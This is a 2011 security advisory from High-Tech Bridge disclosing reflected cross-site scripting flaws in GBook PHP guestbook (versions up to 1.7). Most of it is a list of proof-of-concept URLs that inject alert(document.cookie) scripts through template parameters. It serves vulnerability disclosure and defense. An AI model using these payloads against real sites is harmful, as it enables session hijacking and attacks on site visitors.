Lucene search
High-Tech BridgeHTB23028HistoryJul 06, 2011 - 12:00 a.m.
Cross-site Scripting (XSS) Vulnerabilities in GBook PHP guestbook
2011-07-0600:00:00
High-Tech Bridge
www.htbridge.com
44
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in GBook PHP guestbook which could be exploited to perform cross-site scripting attacks.
- Cross-site scripting (XSS) vulnerabilities in GBook PHP guestbook
The vulnerability exists due to input sanitation error in the multiple parameters in scripts inside /templates/default/ directory. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that βregister_globalsβ is enabled.
Exploitation examples:
http://[host]/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?name=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?from=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?name=%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?email=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?added=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?task_description=%3Cscript%3 Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Eale rt%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/emoticons_popup.php?list_emoticons=%3Cscript %3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/error.php?myproblem=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
http://[host]/templates/default/error.php?backlink=%3Cscript%3Ealert%28docum ent.cookie%29;%3C/script%3E
http://[host]/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[pages_top]=%3Csc ript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&s ettings[target]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_footer.php?settings[show_nospam]=1&s ettings[tpl_path]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/overall_header.php?settings[gbook_title]=%3C script%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
| CPE | Name | Operator | Version |
|---|---|---|---|
| gbook php guestbook | le | 1.7 |